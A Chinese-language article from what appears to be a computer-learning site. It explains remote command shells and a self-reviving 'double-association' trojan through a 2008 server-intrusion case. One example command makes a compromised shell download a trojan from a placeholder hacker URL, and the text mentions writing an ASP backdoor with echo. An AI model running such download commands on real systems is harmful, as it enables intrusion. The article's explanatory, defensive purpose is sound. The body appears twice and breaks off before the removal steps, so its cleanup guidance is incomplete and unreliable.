了解黑客的木马后门清除双关联木马(一)
10-27 14:43:09 浏览次数:180次 栏目:电脑安全
标签:电脑安全知识,个人电脑安全,电脑安全设置,
了解黑客的木马后门清除双关联木马(一),http://www.2xuewang.com
1.什么是Cmdshell?是如何被黑客利用的?
2.如何清除双关联木马?
★必备知识
1.什么是Shell?
Shell的中文意思为“壳”,它管理着用户与操作系统之间的交互,可以把它理解为一个命令解释器。它接收用户命令,然后调用相关的应用程序来执行。
2.什么又是CmdShell?
CmdShell在这里可以称做系统后门,是黑客利用溢出或其他手段,获取目标计算机命令行的远程控制的权利。(Cmd即:用户在运行中输入“cmd”出现的命令行:如图1)
CmdShell
3.CmdShell是如何被黑客获取的?
CmdShell大多是当用户计算机存在漏洞时,黑客利用攻击工具进行远程进攻,导致计算机崩溃,从而丢失系统的控制权限(即CmdShell)。
4.什么是双关联木马?
木马在运行后生成两套完全相同的程序(名称和大小不一定一样),文中的“wlloginproxy.exe”程序(图2)和“services.exe”程序会互相扫描(每0.1秒扫描一次),如果发现对方没有启动或者运行时错误,其中一个木马程序会将自身复制,从新制造一个新的木马运行,导致用户无法完全删除。
木马在运行后生成两套完全相同的程序
【略突出】案例
时间:2008年2月18日
负责工程师:孙佳兴(老孙)
地点:青岛园林建设科技有限责任公司
现场:公司3D园林规划数据服务器被入侵。黑客采用底层入侵技术,绕过了防火墙和杀毒软件,对服务器数据进行了远程植入木马,并窃取了大量高价值产品信息。
【略突出】分析案例
听完了青岛园林建设科技有限责任公司管理员的描述后,工程师老孙详细看了公司的服务器配置:
服务器配置:主服务器为Window2003SP1操作系统(补丁已经更新至2月11日最新微软安全公告提示)
安装组件:IIS6.0(WEB网页服务)
MSSQL2003(数据库)
ISAServer2004(微软的企业级防火墙)
Prowinde1.7.41(条件限制类杀毒软件)
然后,他基本确认了黑客的攻击手段,做出如下分析:
服务器采用企业版杀毒软件和入侵防火墙,限制了administrators和低级权限的运行文件的权利。黑客留下的痕迹证明:他采用的是溢出式攻击,并获取了高于administrators的权限。
小知识
什么是溢出式攻击?
溢出是黑客利用操作系统的漏洞,专门开发一种程序,加上相应的参数运行后,就可以得到你电脑具有管理员资格的控制权,等于你的电脑就是他的了。
听完工程师老孙的分析后,公司网络管理员非常迷惑,到底黑客如何利用CmdShell下的远程控制进行传输,并进行后门植入的呢?
【加细框】下段可以学到:黑客实现远程传输的两种方法
老孙分析着残留的文件,基本推测出了黑客的攻击方式:
第一种方法:利用Echo命令写ASP后门。
小知识
Echo命令小解
主要功能:简单点说就是开启或关闭批处理命令行在屏幕上的显示,属于内部命令。内部命令就是常驻于内存的命令,在任意路径下输入均可执行。
目的:一是避免不需要的命令显示来干扰屏幕;二是在屏幕上给用户显示提示信息。
此方法原理:由于目标主机上已经安装了IIS服务,黑客在拥有CmdShell的情况下,利用Echo命令制造一个允许传输的ASP后门木马,来管理被入侵的计算机。
第二种方法:利用CmdShell结合网页进行远程传输。
由于黑客在入侵完成后删除了大部分日志,老孙推测还有另外一种方法也可以实现入侵:利用“开始→运行”,输入“cmd”打开命令提示符,输入“start”命令,将木马自动下载到网页缓存中。
例如:startitshttp://www.xxx.com/hack/ps.exe
在远程Shell中执行上面这个命令后,“ps.exe”已经下载到目标主机的网页缓存目录中了。然后继续通过Cmd命令获得“ps.exe”的具体位置。
小提示
对于以服务为启动方式的后门所提供的Shell,其用户身份一般都是System。
由于黑客在入侵时候会启动一个IE进程,如果是System身份的Shell,就不会在本地出现窗口,(这种情况符合黑客的入侵行为,避开了防火墙的权限限制)。
【略突出】防!
入侵分析结束了,接下来就是要解决黑客留下的后门木马。由于木马采用了双关联保护结构,为了清理后门并避免以后再出现类似入侵,老孙还特意做了一份详细的解决方案。
【加细框】下段可以学到:双关联木马为什么难以清除
黑客在入侵后种植的后门木马程序运行后会生成三个文件,分别是:
C:/WINDOWS/wlloginproxy.exe
C:/WINDOWS/Explore32.exe
C:/WINDOWS/system/services.exe(图3)
伪装进程
这三个文件用的都是HTM文件图标,千万不要以为它们是HTM文件!如果你的系统设置为显示所有文件的扩展名,看看图4,你会发现它们都还有个“.exe”的尾巴,这说明它们是可执行文件!
扩展名里有猫腻
这三个文件又分别起什么作用呢?“wlloginproxy.exe”文件用来在启动时加载运行,它是守护进程!
小知识
守护进程:
对木马来说,如果客户端向服务端的某一特定端口提出连接请求,服务端上的相应程序就会自动运行,来应答客户端的请求,我们称这个程序为守护进程。
“Explore32.exe”和“services.exe”是干什么的呢?呵呵,它们分别用来和HLP文件(帮助文件)、TXT文件(文本文件)关联,如果你发现并删除了“wlloginproxy.exe”,并不会真正清除了它。一旦打开帮助文件或文本文件,“Explore32.exe”和“services.exe”将被激活!它将再次生成守护进程“wlloginproxy.exe”。这就是服务器一旦被种植了双关联木马,就很难清除干净的原因!
【加细框】下段可以学到:双关联木马的清除方法
老孙的方案一:彻底清除双关联木马
1.删除文件
先删除C,了解黑客的木马后门清除双关联木马(一)
1.什么是Cmdshell?是如何被黑客利用的?
2.如何清除双关联木马?
★必备知识
1.什么是Shell?
Shell的中文意思为“壳”,它管理着用户与操作系统之间的交互,可以把它理解为一个命令解释器。它接收用户命令,然后调用相关的应用程序来执行。
2.什么又是CmdShell?
CmdShell在这里可以称做系统后门,是黑客利用溢出或其他手段,获取目标计算机命令行的远程控制的权利。(Cmd即:用户在运行中输入“cmd”出现的命令行:如图1)
CmdShell
3.CmdShell是如何被黑客获取的?
CmdShell大多是当用户计算机存在漏洞时,黑客利用攻击工具进行远程进攻,导致计算机崩溃,从而丢失系统的控制权限(即CmdShell)。
4.什么是双关联木马?
木马在运行后生成两套完全相同的程序(名称和大小不一定一样),文中的“wlloginproxy.exe”程序(图2)和“services.exe”程序会互相扫描(每0.1秒扫描一次),如果发现对方没有启动或者运行时错误,其中一个木马程序会将自身复制,从新制造一个新的木马运行,导致用户无法完全删除。
木马在运行后生成两套完全相同的程序
【略突出】案例
时间:2008年2月18日
负责工程师:孙佳兴(老孙)
地点:青岛园林建设科技有限责任公司
现场:公司3D园林规划数据服务器被入侵。黑客采用底层入侵技术,绕过了防火墙和杀毒软件,对服务器数据进行了远程植入木马,并窃取了大量高价值产品信息。
【略突出】分析案例
听完了青岛园林建设科技有限责任公司管理员的描述后,工程师老孙详细看了公司的服务器配置:
服务器配置:主服务器为Window2003SP1操作系统(补丁已经更新至2月11日最新微软安全公告提示)
安装组件:IIS6.0(WEB网页服务)
MSSQL2003(数据库)
ISAServer2004(微软的企业级防火墙)
Prowinde1.7.41(条件限制类杀毒软件)
然后,他基本确认了黑客的攻击手段,做出如下分析:
服务器采用企业版杀毒软件和入侵防火墙,限制了administrators和低级权限的运行文件的权利。黑客留下的痕迹证明:他采用的是溢出式攻击,并获取了高于administrators的权限。
小知识
什么是溢出式攻击?
溢出是黑客利用操作系统的漏洞,专门开发一种程序,加上相应的参数运行后,就可以得到你电脑具有管理员资格的控制权,等于你的电脑就是他的了。
听完工程师老孙的分析后,公司网络管理员非常迷惑,到底黑客如何利用CmdShell下的远程控制进行传输,并进行后门植入的呢?
【加细框】下段可以学到:黑客实现远程传输的两种方法
老孙分析着残留的文件,基本推测出了黑客的攻击方式:
第一种方法:利用Echo命令写ASP后门。
小知识
Echo命令小解
主要功能:简单点说就是开启或关闭批处理命令行在屏幕上的显示,属于内部命令。内部命令就是常驻于内存的命令,在任意路径下输入均可执行。
目的:一是避免不需要的命令显示来干扰屏幕;二是在屏幕上给用户显示提示信息。
此方法原理:由于目标主机上已经安装了IIS服务,黑客在拥有CmdShell的情况下,利用Echo命令制造一个允许传输的ASP后门木马,来管理被入侵的计算机。
第二种方法:利用CmdShell结合网页进行远程传输。
由于黑客在入侵完成后删除了大部分日志,老孙推测还有另外一种方法也可以实现入侵:利用“开始→运行”,输入“cmd”打开命令提示符,输入“start”命令,将木马自动下载到网页缓存中。
例如:startitshttp://www.xxx.com/hack/ps.exe
在远程Shell中执行上面这个命令后,“ps.exe”已经下载到目标主机的网页缓存目录中了。然后继续通过Cmd命令获得“ps.exe”的具体位置。
小提示
对于以服务为启动方式的后门所提供的Shell,其用户身份一般都是System。
由于黑客在入侵时候会启动一个IE进程,如果是System身份的Shell,就不会在本地出现窗口,(这种情况符合黑客的入侵行为,避开了防火墙的权限限制)。
【略突出】防!
入侵分析结束了,接下来就是要解决黑客留下的后门木马。由于木马采用了双关联保护结构,为了清理后门并避免以后再出现类似入侵,老孙还特意做了一份详细的解决方案。
【加细框】下段可以学到:双关联木马为什么难以清除
黑客在入侵后种植的后门木马程序运行后会生成三个文件,分别是:
C:/WINDOWS/wlloginproxy.exe
C:/WINDOWS/Explore32.exe
C:/WINDOWS/system/services.exe(图3)
伪装进程
这三个文件用的都是HTM文件图标,千万不要以为它们是HTM文件!如果你的系统设置为显示所有文件的扩展名,看看图4,你会发现它们都还有个“.exe”的尾巴,这说明它们是可执行文件!
扩展名里有猫腻
这三个文件又分别起什么作用呢?“wlloginproxy.exe”文件用来在启动时加载运行,它是守护进程!
小知识
守护进程:
对木马来说,如果客户端向服务端的某一特定端口提出连接请求,服务端上的相应程序就会自动运行,来应答客户端的请求,我们称这个程序为守护进程。
“Explore32.exe”和“services.exe”是干什么的呢?呵呵,它们分别用来和HLP文件(帮助文件)、TXT文件(文本文件)关联,如果你发现并删除了“wlloginproxy.exe”,并不会真正清除了它。一旦打开帮助文件或文本文件,“Explore32.exe”和“services.exe”将被激活!它将再次生成守护进程“wlloginproxy.exe”。这就是服务器一旦被种植了双关联木马,就很难清除干净的原因!
【加细框】下段可以学到:双关联木马的清除方法
老孙的方案一:彻底清除双关联木马
1.删除文件
先删除C,了解黑客的木马后门清除双关联木马(一)
上一篇:如何知道自己是不是中木马
《了解黑客的木马后门清除双关联木马(一)》相关文章
- 了解黑客的木马后门清除双关联木马(一)
- › 了解黑客的木马后门清除双关联木马(一)
- 在百度中搜索相关文章:了解黑客的木马后门清除双关联木马(一)
- 在谷歌中搜索相关文章:了解黑客的木马后门清除双关联木马(一)
- 在soso中搜索相关文章:了解黑客的木马后门清除双关联木马(一)
- 在搜狗中搜索相关文章:了解黑客的木马后门清除双关联木马(一) 大赛终评答辩会
tag: 电脑安全,电脑安全知识,个人电脑安全,电脑安全设置,电脑学习 - 电脑安全
>电脑安全 更新
>电脑安全 推荐